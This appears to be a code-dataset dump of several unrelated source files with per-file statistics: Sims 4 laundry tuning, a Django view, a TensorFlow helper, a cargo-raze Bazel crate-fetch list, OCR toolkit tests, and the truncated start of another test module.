PUT_AWAY_FINISHED_LAUNDRY = TunableTuple(description='\n The tunable to update laundry service on Put Away finished laundry\n interaction.\n ', interaction_tag=TunableEnumWithFilter(description='\n Tag that represent the put away finished laundry interaction which \n will update Laundry Service data.\n ', tunable_type=Tag, default=Tag.INVALID, filter_prefixes=('interaction',)), laundry_condition_states=TunableTuple(description='\n This is the state type of completed laundry object condition \n which will aggregate the data to the laundry service.\n ', condition_states=TunableList(description='\n A list of state types to be stored on laundry service.\n ', tunable=TunableStateTypeReference(pack_safe=True), unique_entries=True), excluded_states=TunableList(description='\n A list of state values of Condition States which will not \n be added to the laundry service.\n ', tunable=TunableStateValueReference(pack_safe=True), unique_entries=True)), laundry_condition_timeout=TunableSimMinute(description='\n The amount of time in Sim minutes that the individual laundry\n finished conditions will be kept in the laundry conditions \n aggregate data.\n ', default=1440, minimum=0), conditions_and_rewards_map=TunableMapping(description='\n Mapping of laundry conditions and loot rewards.\n ', key_type=TunableReference(manager=services.get_instance_manager(sims4.resources.Types.OBJECT_STATE), pack_safe=True), value_type=TunableReference(manager=services.get_instance_manager(sims4.resources.Types.ACTION), class_restrictions=('LootActions',), pack_safe=True)))
PUT_CLOTHING_PILE_ON_HAMPER = TunableTuple(description='\n The Tunable to directly put generated clothing pile in the hamper.\n ', chance=TunablePercent(description='\n The chance that a clothing pile will be put directly in the hamper. \n Tune the value in case putting clothing pile in hamper every \n spin-outfit-change feeling excessive.\n ', default=100), clothing_pile=TunableTuple(description="\n Clothing pile object that will be created and put into the hamper \n automatically. \n \n You won't see the object on the lot since it will go directly to \n the hamper. We create it because we need to transfer all of the \n commodities data and average the values into the hamper precisely.\n ", definition=TunablePackSafeReference(description='\n Reference to clothing pile object definition.\n ', manager=services.definition_manager()), initial_states=TunableList(description='\n A list of states to apply to the clothing pile as soon as it \n is created.\n ', tunable=TunableTuple(description='\n The state to apply and optional to decide if the state \n should be applied.\n ', state=TunableStateValueReference(pack_safe=True), tests=TunableTestSet()))), full_hamper_state=TunableStateValueReference(description='\n The state of full hamper which make the hamper is unavailable to \n add new clothing pile in it.\n ', pack_safe=True), loots_to_apply=TunableList(description='\n Loots to apply to the hamper when clothing pile is being put.\n ', tunable=TunableReference(manager=services.get_instance_manager(sims4.resources.Types.ACTION), class_restrictions=('LootActions',), pack_safe=True)), tests=TunableTestSet(description='\n The test to run on the Sim that must pass in order for putting\n clothing pile automatically to the hamper. These tests will only \n be run when we have available hamper on the lot.\n '))
| 444.941176 | 2,197 | 0.707694 | 970 | 7,564 | 5.426804 | 0.227835 | 0.059271 | 0.025646 | 0.024696 | 0.392287 | 0.333017 | 0.271847 | 0.227964 | 0.212386 | 0.212386 | 0 | 0.003565 | 0.221179 | 7,564 | 16 | 2,198 | 472.75 | 0.890002 | 0 | 0 | 0 | 0 | 1.133333 | 0.567425 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.466667 | 0 | 0.933333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
53df6295fecc284a19e9859a4b445ac32b9f50d6 | 107 | py | Python | app/elastic-plugin/gui/views.py | starmanone/elastic-plugin | 04fa6764e10e6f58f934f78ce79cc43a4e59ddf9 | [
"MIT"
] | null | null | null | app/elastic-plugin/gui/views.py | starmanone/elastic-plugin | 04fa6764e10e6f58f934f78ce79cc43a4e59ddf9 | [
"MIT"
] | null | null | null | app/elastic-plugin/gui/views.py | starmanone/elastic-plugin | 04fa6764e10e6f58f934f78ce79cc43a4e59ddf9 | [
"MIT"
] | 1 | 2021-01-15T14:43:13.000Z | 2021-01-15T14:43:13.000Z | from django.shortcuts import render
def index(request):
return render(request,'gui/home-gui.html') | 26.75 | 46 | 0.738318 | 15 | 107 | 5.266667 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149533 | 107 | 4 | 46 | 26.75 | 0.868132 | 0 | 0 | 0 | 0 | 0 | 0.157407 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
9901f5b8a19a3f3fd677b3932e0aae10e8c475d1 | 194 | py | Python | mantraml/models/tensorflow/summary.py | cclauss/mantra | 19e2f72960da8314f11768d9acfe7836629b817c | [
"Apache-2.0"
] | null | null | null | mantraml/models/tensorflow/summary.py | cclauss/mantra | 19e2f72960da8314f11768d9acfe7836629b817c | [
"Apache-2.0"
] | null | null | null | mantraml/models/tensorflow/summary.py | cclauss/mantra | 19e2f72960da8314f11768d9acfe7836629b817c | [
"Apache-2.0"
] | null | null | null | import os
import tensorflow as tf
def FileWriter(mantra_model, **kwargs):
return tf.summary.FileWriter('%s/trials/%s/logs/' % (os.getcwd(), mantra_model.trial.trial_folder_name), **kwargs) | 32.333333 | 118 | 0.742268 | 28 | 194 | 5 | 0.678571 | 0.157143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103093 | 194 | 6 | 118 | 32.333333 | 0.804598 | 0 | 0 | 0 | 0 | 0 | 0.092308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
073066d78d57b310519aa253a79aef02141f7ed5 | 110 | py | Python | lang/py/cookbook/v2/source/cb2_1_23_sol_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/cookbook/v2/source/cb2_1_23_sol_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/cookbook/v2/source/cb2_1_23_sol_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | def encode_for_html(unicode_data, encoding='ascii'):
return unicode_data.encode(encoding, 'html_replace')
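# Note (added): 'html_replace' is a custom error handler, not a built-in codec
# behaviour; it must be registered first, e.g. codecs.register_error('html_replace',
# some_handler) as in the companion recipes, otherwise .encode raises LookupError.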
| 36.666667 | 56 | 0.790909 | 15 | 110 | 5.466667 | 0.666667 | 0.268293 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 110 | 2 | 57 | 55 | 0.82 | 0 | 0 | 0 | 0 | 0 | 0.154545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
073379ac5fbd211718cc1728b34c3d765a465356 | 18,112 | bzl | Python | bazel/complicated_cargo_library_remote/cargo/crates.bzl | acmcarther/cargo-raze-examples | a9d9b8f589ca93e3be235d98cada6354da796ecf | [
"Apache-2.0"
] | 4 | 2017-09-13T21:49:24.000Z | 2020-06-20T17:38:50.000Z | bazel/complicated_cargo_library_remote/cargo/crates.bzl | acmcarther/cargo-raze-examples | a9d9b8f589ca93e3be235d98cada6354da796ecf | [
"Apache-2.0"
] | 6 | 2017-09-13T00:53:42.000Z | 2019-05-01T01:00:52.000Z | bazel/complicated_cargo_library_remote/cargo/crates.bzl | acmcarther/cargo-raze-examples | a9d9b8f589ca93e3be235d98cada6354da796ecf | [
"Apache-2.0"
] | 1 | 2018-03-15T03:12:06.000Z | 2018-03-15T03:12:06.000Z | """
cargo-raze crate workspace functions
DO NOT EDIT! Replaced on runs of cargo-raze
"""
def complicated_fetch_remote_crates():
native.new_http_archive(
name = "complicated__aho_corasick__0_6_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/aho-corasick/aho-corasick-0.6.4.crate",
type = "tar.gz",
strip_prefix = "aho-corasick-0.6.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:aho-corasick-0.6.4.BUILD"
)
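    # Orientation comment (added): each entry pins one crate. `name` is the
    # Bazel repository label, `url` and `strip_prefix` locate the crates.io
    # tarball, and `build_file` points at the raze-generated BUILD file; all
    # archives below share this shape.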
native.new_http_archive(
name = "complicated__arrayvec__0_3_25",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/arrayvec/arrayvec-0.3.25.crate",
type = "tar.gz",
strip_prefix = "arrayvec-0.3.25",
build_file = "//complicated_cargo_library_remote/cargo/remote:arrayvec-0.3.25.BUILD"
)
native.new_http_archive(
name = "complicated__arrayvec__0_4_7",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/arrayvec/arrayvec-0.4.7.crate",
type = "tar.gz",
strip_prefix = "arrayvec-0.4.7",
build_file = "//complicated_cargo_library_remote/cargo/remote:arrayvec-0.4.7.BUILD"
)
native.new_http_archive(
name = "complicated__atom__0_3_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/atom/atom-0.3.4.crate",
type = "tar.gz",
strip_prefix = "atom-0.3.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:atom-0.3.4.BUILD"
)
native.new_http_archive(
name = "complicated__bitflags__1_0_1",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/bitflags/bitflags-1.0.1.crate",
type = "tar.gz",
strip_prefix = "bitflags-1.0.1",
build_file = "//complicated_cargo_library_remote/cargo/remote:bitflags-1.0.1.BUILD"
)
native.new_http_archive(
name = "complicated__cfg_if__0_1_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/cfg-if/cfg-if-0.1.2.crate",
type = "tar.gz",
strip_prefix = "cfg-if-0.1.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:cfg-if-0.1.2.BUILD"
)
native.new_http_archive(
name = "complicated__crossbeam__0_3_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/crossbeam/crossbeam-0.3.2.crate",
type = "tar.gz",
strip_prefix = "crossbeam-0.3.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:crossbeam-0.3.2.BUILD"
)
native.new_http_archive(
name = "complicated__crossbeam_deque__0_2_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/crossbeam-deque/crossbeam-deque-0.2.0.crate",
type = "tar.gz",
strip_prefix = "crossbeam-deque-0.2.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:crossbeam-deque-0.2.0.BUILD"
)
native.new_http_archive(
name = "complicated__crossbeam_epoch__0_3_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/crossbeam-epoch/crossbeam-epoch-0.3.0.crate",
type = "tar.gz",
strip_prefix = "crossbeam-epoch-0.3.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:crossbeam-epoch-0.3.0.BUILD"
)
native.new_http_archive(
name = "complicated__crossbeam_utils__0_2_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/crossbeam-utils/crossbeam-utils-0.2.2.crate",
type = "tar.gz",
strip_prefix = "crossbeam-utils-0.2.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:crossbeam-utils-0.2.2.BUILD"
)
native.new_http_archive(
name = "complicated__derivative__1_0_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/derivative/derivative-1.0.0.crate",
type = "tar.gz",
strip_prefix = "derivative-1.0.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:derivative-1.0.0.BUILD"
)
native.new_http_archive(
name = "complicated__either__1_4_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/either/either-1.4.0.crate",
type = "tar.gz",
strip_prefix = "either-1.4.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:either-1.4.0.BUILD"
)
native.new_http_archive(
name = "complicated__fnv__1_0_6",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/fnv/fnv-1.0.6.crate",
type = "tar.gz",
strip_prefix = "fnv-1.0.6",
build_file = "//complicated_cargo_library_remote/cargo/remote:fnv-1.0.6.BUILD"
)
native.new_http_archive(
name = "complicated__fuchsia_zircon__0_3_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/fuchsia-zircon/fuchsia-zircon-0.3.3.crate",
type = "tar.gz",
strip_prefix = "fuchsia-zircon-0.3.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:fuchsia-zircon-0.3.3.BUILD"
)
native.new_http_archive(
name = "complicated__fuchsia_zircon_sys__0_3_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/fuchsia-zircon-sys/fuchsia-zircon-sys-0.3.3.crate",
type = "tar.gz",
strip_prefix = "fuchsia-zircon-sys-0.3.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:fuchsia-zircon-sys-0.3.3.BUILD"
)
native.new_http_archive(
name = "complicated__hibitset__0_3_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/hibitset/hibitset-0.3.2.crate",
type = "tar.gz",
strip_prefix = "hibitset-0.3.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:hibitset-0.3.2.BUILD"
)
native.new_http_archive(
name = "complicated__itertools__0_5_10",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/itertools/itertools-0.5.10.crate",
type = "tar.gz",
strip_prefix = "itertools-0.5.10",
build_file = "//complicated_cargo_library_remote/cargo/remote:itertools-0.5.10.BUILD"
)
native.new_http_archive(
name = "complicated__lazy_static__0_2_11",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/lazy_static/lazy_static-0.2.11.crate",
type = "tar.gz",
strip_prefix = "lazy_static-0.2.11",
build_file = "//complicated_cargo_library_remote/cargo/remote:lazy_static-0.2.11.BUILD"
)
native.new_http_archive(
name = "complicated__lazy_static__1_0_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/lazy_static/lazy_static-1.0.0.crate",
type = "tar.gz",
strip_prefix = "lazy_static-1.0.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:lazy_static-1.0.0.BUILD"
)
native.new_http_archive(
name = "complicated__libc__0_2_36",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/libc/libc-0.2.36.crate",
type = "tar.gz",
strip_prefix = "libc-0.2.36",
build_file = "//complicated_cargo_library_remote/cargo/remote:libc-0.2.36.BUILD"
)
native.new_http_archive(
name = "complicated__memchr__2_0_1",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/memchr/memchr-2.0.1.crate",
type = "tar.gz",
strip_prefix = "memchr-2.0.1",
build_file = "//complicated_cargo_library_remote/cargo/remote:memchr-2.0.1.BUILD"
)
native.new_http_archive(
name = "complicated__memoffset__0_2_1",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/memoffset/memoffset-0.2.1.crate",
type = "tar.gz",
strip_prefix = "memoffset-0.2.1",
build_file = "//complicated_cargo_library_remote/cargo/remote:memoffset-0.2.1.BUILD"
)
native.new_http_archive(
name = "complicated__mopa__0_2_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/mopa/mopa-0.2.2.crate",
type = "tar.gz",
strip_prefix = "mopa-0.2.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:mopa-0.2.2.BUILD"
)
native.new_http_archive(
name = "complicated__nodrop__0_1_12",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/nodrop/nodrop-0.1.12.crate",
type = "tar.gz",
strip_prefix = "nodrop-0.1.12",
build_file = "//complicated_cargo_library_remote/cargo/remote:nodrop-0.1.12.BUILD"
)
native.new_http_archive(
name = "complicated__num_cpus__1_8_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/num_cpus/num_cpus-1.8.0.crate",
type = "tar.gz",
strip_prefix = "num_cpus-1.8.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:num_cpus-1.8.0.BUILD"
)
native.new_http_archive(
name = "complicated__odds__0_2_26",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/odds/odds-0.2.26.crate",
type = "tar.gz",
strip_prefix = "odds-0.2.26",
build_file = "//complicated_cargo_library_remote/cargo/remote:odds-0.2.26.BUILD"
)
native.new_http_archive(
name = "complicated__pulse__0_5_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/pulse/pulse-0.5.3.crate",
type = "tar.gz",
strip_prefix = "pulse-0.5.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:pulse-0.5.3.BUILD"
)
native.new_http_archive(
name = "complicated__quote__0_3_15",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/quote/quote-0.3.15.crate",
type = "tar.gz",
strip_prefix = "quote-0.3.15",
build_file = "//complicated_cargo_library_remote/cargo/remote:quote-0.3.15.BUILD"
)
native.new_http_archive(
name = "complicated__rand__0_4_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/rand/rand-0.4.2.crate",
type = "tar.gz",
strip_prefix = "rand-0.4.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:rand-0.4.2.BUILD"
)
native.new_http_archive(
name = "complicated__rayon__0_8_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/rayon/rayon-0.8.2.crate",
type = "tar.gz",
strip_prefix = "rayon-0.8.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:rayon-0.8.2.BUILD"
)
native.new_http_archive(
name = "complicated__rayon_core__1_4_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/rayon-core/rayon-core-1.4.0.crate",
type = "tar.gz",
strip_prefix = "rayon-core-1.4.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:rayon-core-1.4.0.BUILD"
)
native.new_http_archive(
name = "complicated__redox_syscall__0_1_37",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/redox_syscall/redox_syscall-0.1.37.crate",
type = "tar.gz",
strip_prefix = "redox_syscall-0.1.37",
build_file = "//complicated_cargo_library_remote/cargo/remote:redox_syscall-0.1.37.BUILD"
)
native.new_http_archive(
name = "complicated__regex__0_2_6",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/regex/regex-0.2.6.crate",
type = "tar.gz",
strip_prefix = "regex-0.2.6",
build_file = "//complicated_cargo_library_remote/cargo/remote:regex-0.2.6.BUILD"
)
native.new_http_archive(
name = "complicated__regex_syntax__0_4_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/regex-syntax/regex-syntax-0.4.2.crate",
type = "tar.gz",
strip_prefix = "regex-syntax-0.4.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:regex-syntax-0.4.2.BUILD"
)
native.new_http_archive(
name = "complicated__scopeguard__0_3_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/scopeguard/scopeguard-0.3.3.crate",
type = "tar.gz",
strip_prefix = "scopeguard-0.3.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:scopeguard-0.3.3.BUILD"
)
native.new_http_archive(
name = "complicated__shred__0_5_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/shred/shred-0.5.2.crate",
type = "tar.gz",
strip_prefix = "shred-0.5.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:shred-0.5.2.BUILD"
)
native.new_http_archive(
name = "complicated__shred_derive__0_3_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/shred-derive/shred-derive-0.3.0.crate",
type = "tar.gz",
strip_prefix = "shred-derive-0.3.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:shred-derive-0.3.0.BUILD"
)
native.new_http_archive(
name = "complicated__smallvec__0_4_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/smallvec/smallvec-0.4.4.crate",
type = "tar.gz",
strip_prefix = "smallvec-0.4.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:smallvec-0.4.4.BUILD"
)
native.new_http_archive(
name = "complicated__specs__0_10_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/specs/specs-0.10.0.crate",
type = "tar.gz",
strip_prefix = "specs-0.10.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:specs-0.10.0.BUILD"
)
native.new_http_archive(
name = "complicated__syn__0_10_8",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/syn/syn-0.10.8.crate",
type = "tar.gz",
strip_prefix = "syn-0.10.8",
build_file = "//complicated_cargo_library_remote/cargo/remote:syn-0.10.8.BUILD"
)
native.new_http_archive(
name = "complicated__syn__0_11_11",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/syn/syn-0.11.11.crate",
type = "tar.gz",
strip_prefix = "syn-0.11.11",
build_file = "//complicated_cargo_library_remote/cargo/remote:syn-0.11.11.BUILD"
)
native.new_http_archive(
name = "complicated__synom__0_11_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/synom/synom-0.11.3.crate",
type = "tar.gz",
strip_prefix = "synom-0.11.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:synom-0.11.3.BUILD"
)
native.new_http_archive(
name = "complicated__thread_local__0_3_5",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/thread_local/thread_local-0.3.5.crate",
type = "tar.gz",
strip_prefix = "thread_local-0.3.5",
build_file = "//complicated_cargo_library_remote/cargo/remote:thread_local-0.3.5.BUILD"
)
native.new_http_archive(
name = "complicated__time__0_1_39",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/time/time-0.1.39.crate",
type = "tar.gz",
strip_prefix = "time-0.1.39",
build_file = "//complicated_cargo_library_remote/cargo/remote:time-0.1.39.BUILD"
)
native.new_http_archive(
name = "complicated__tuple_utils__0_2_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/tuple_utils/tuple_utils-0.2.0.crate",
type = "tar.gz",
strip_prefix = "tuple_utils-0.2.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:tuple_utils-0.2.0.BUILD"
)
native.new_http_archive(
name = "complicated__unicode_xid__0_0_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/unicode-xid/unicode-xid-0.0.4.crate",
type = "tar.gz",
strip_prefix = "unicode-xid-0.0.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:unicode-xid-0.0.4.BUILD"
)
native.new_http_archive(
name = "complicated__unreachable__1_0_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/unreachable/unreachable-1.0.0.crate",
type = "tar.gz",
strip_prefix = "unreachable-1.0.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:unreachable-1.0.0.BUILD"
)
native.new_http_archive(
name = "complicated__utf8_ranges__1_0_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/utf8-ranges/utf8-ranges-1.0.0.crate",
type = "tar.gz",
strip_prefix = "utf8-ranges-1.0.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:utf8-ranges-1.0.0.BUILD"
)
native.new_http_archive(
name = "complicated__void__1_0_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/void/void-1.0.2.crate",
type = "tar.gz",
strip_prefix = "void-1.0.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:void-1.0.2.BUILD"
)
native.new_http_archive(
name = "complicated__winapi__0_3_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/winapi/winapi-0.3.4.crate",
type = "tar.gz",
strip_prefix = "winapi-0.3.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:winapi-0.3.4.BUILD"
)
native.new_http_archive(
name = "complicated__winapi_i686_pc_windows_gnu__0_4_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/winapi-i686-pc-windows-gnu/winapi-i686-pc-windows-gnu-0.4.0.crate",
type = "tar.gz",
strip_prefix = "winapi-i686-pc-windows-gnu-0.4.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:winapi-i686-pc-windows-gnu-0.4.0.BUILD"
)
native.new_http_archive(
name = "complicated__winapi_x86_64_pc_windows_gnu__0_4_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/winapi-x86_64-pc-windows-gnu/winapi-x86_64-pc-windows-gnu-0.4.0.crate",
type = "tar.gz",
strip_prefix = "winapi-x86_64-pc-windows-gnu-0.4.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:winapi-x86_64-pc-windows-gnu-0.4.0.BUILD"
)
| 42.616471 | 138 | 0.65487 | 2,707 | 18,112 | 4.110085 | 0.043591 | 0.042064 | 0.060759 | 0.093475 | 0.929984 | 0.86536 | 0.818713 | 0.756696 | 0.652885 | 0.480227 | 0 | 0.056204 | 0.190537 | 18,112 | 424 | 139 | 42.716981 | 0.702681 | 0.004472 | 0 | 0.284932 | 1 | 0.147945 | 0.585118 | 0.292476 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00274 | true | 0 | 0 | 0 | 0.00274 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0754c2fb82c05b874aef809336d979b24632fe6a | 1,615 | py | Python | tests/ocr/test_customocr_object.py | IndicoDataSolutions/Indico-Solutions-Toolkit | c9a38681c84e86a48bcde0867359ddd2f52ce236 | [
"MIT"
] | 6 | 2021-05-20T16:48:27.000Z | 2022-03-15T15:43:40.000Z | tests/ocr/test_customocr_object.py | IndicoDataSolutions/Indico-Solutions-Toolkit | c9a38681c84e86a48bcde0867359ddd2f52ce236 | [
"MIT"
] | 25 | 2021-06-25T13:37:21.000Z | 2022-01-03T15:54:26.000Z | tests/ocr/test_customocr_object.py | IndicoDataSolutions/Indico-Solutions-Toolkit | c9a38681c84e86a48bcde0867359ddd2f52ce236 | [
"MIT"
] | null | null | null | import pytest
from indico_toolkit.indico_wrapper import DocExtraction


def test_full_text(indico_client, pdf_filepath):
    doc_extraction = DocExtraction(indico_client, preset_config="simple")
    custom_ocr = doc_extraction.run_ocr(filepaths=[pdf_filepath])
    assert len(custom_ocr[0].full_text) == 2823


def test_full_text_exception(indico_client, pdf_filepath):
    doc_extraction = DocExtraction(
        indico_client,
        custom_config={
            "nest": True,
            "top_level": "document",
            "native_pdf": True,
            "blocks": ["text", "position", "doc_offset", "page_offset"],
        },
    )
    custom_ocr = doc_extraction.run_ocr(filepaths=[pdf_filepath])
    with pytest.raises(Exception):
        custom_ocr[0].full_text


def test_page_texts(indico_client, pdf_filepath):
    doc_extraction = DocExtraction(
        indico_client,
        custom_config={
            "nest": True,
            "top_level": "document",
            "native_pdf": True,
            "pages": ["text", "size", "dpi", "doc_offset", "page_num", "image"],
            "blocks": ["text", "position", "doc_offset", "page_offset"],
        },
    )
    custom_ocr = doc_extraction.run_ocr(filepaths=[pdf_filepath])
    assert isinstance(custom_ocr[0].page_texts, list)
    assert isinstance(custom_ocr[0].page_texts[0], str)


def test_page_texts_exception(indico_client, pdf_filepath):
    doc_extraction = DocExtraction(indico_client, preset_config="legacy")
    custom_ocr = doc_extraction.run_ocr(filepaths=[pdf_filepath])
    with pytest.raises(Exception):
        custom_ocr.page_texts
| 34.361702 | 80 | 0.671827 | 190 | 1,615 | 5.352632 | 0.263158 | 0.079646 | 0.058997 | 0.090462 | 0.807276 | 0.780728 | 0.780728 | 0.717797 | 0.717797 | 0.717797 | 0 | 0.007042 | 0.208669 | 1,615 | 46 | 81 | 35.108696 | 0.788732 | 0 | 0 | 0.526316 | 0 | 0 | 0.118266 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4aca1a54f4e6e0b8dbb54440a7f0d2d42b7f1a65 | 5,470 | py | Python | tests/test_routes_files.py | altmirai/altpiggybank | 751590642e0a2a572310923fbd971acd0fdf8527 | [
"MIT"
] | null | null | null | tests/test_routes_files.py | altmirai/altpiggybank | 751590642e0a2a572310923fbd971acd0fdf8527 | [
"MIT"
] | 6 | 2020-08-13T13:45:12.000Z | 2020-08-14T15:08:41.000Z | tests/test_routes_files.py | altmirai/altpiggybank | 751590642e0a2a572310923fbd971acd0fdf8527 | [
"MIT"
] | 1 | 2020-08-13T16:16:00.000Z | 2020-08-13T16:16:00.000Z | from unittest import mock
from click.testing import CliRunner
from tests.test_data import TestDataOne, MockFeeEstOne
from src.routes import main
from src.files import excel_date
import datetime
import json
from hashlib import sha256
import os

t = TestDataOne()


def set_up_files():
    tear_down_files()
    os.mkdir(t.output_path)


def tear_down_files():
